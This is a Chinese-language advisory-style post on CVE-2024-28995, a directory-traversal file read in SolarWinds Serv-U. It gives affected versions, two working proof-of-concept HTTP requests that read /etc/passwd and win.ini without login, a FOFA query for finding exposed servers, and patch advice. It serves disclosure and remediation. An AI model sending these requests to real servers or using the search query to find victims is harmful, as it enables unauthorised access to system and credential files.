CVE-2024-28995:SolarWinds Serv-U FTP目录遍历文件读取

2024-08-05 14:32:18 浏览数 (2)

影响范围

SolarWinds Serv-U FTP Server <= 15.4.2 Hotfix 1

SolarWinds Serv-U Gateway <= 15.4.2 Hotfix 1

SolarWinds Serv-U MFT Server <= 15.4.2 Hotfix 1

漏洞概述

SolarWinds是一家提供广泛的IT管理和网络管理软件解决方案的公司,SolarWinds的产品被设计用于监控和管理网络设备、服务器、应用程序和网络流量等。Serv-U是SolarWinds提供的一款FTP(文件传输协议)服务器软件,2024年6月官方发布安全更新修复了CVE-2024-28995 SolarWinds Serv-U FTP目录遍历文件读取漏洞,攻击者无需登陆即可构造恶意请求读取系统上文件,从而造成敏感信息泄漏

漏洞复现

应用主界面如下所示:

Linux平台利用POC:

代码语言:javascript复制
GET /?InternalDir=........etc&InternalFile=passwd HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Windows平台:

代码语言:javascript复制
GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
Host: xx.xxx.xxx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
目标检索

FOFA:

代码语言:javascript复制
server="Serv-U"
安全建议

目前官方已有可更新版本(https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-4-2-Hotfix-2-Releas e-Notes),建议Serv-U用户尽快应用此修补程序

  • SolarWinds Serv-U FTP Server >= 15.4.2 Hotfix 2
  • SolarWinds Serv-U Gateway >= 15.4.2 Hotfix 2
  • SolarWinds Serv-U MFT Server >= 15.4.2 Hotfix 2

0 人点赞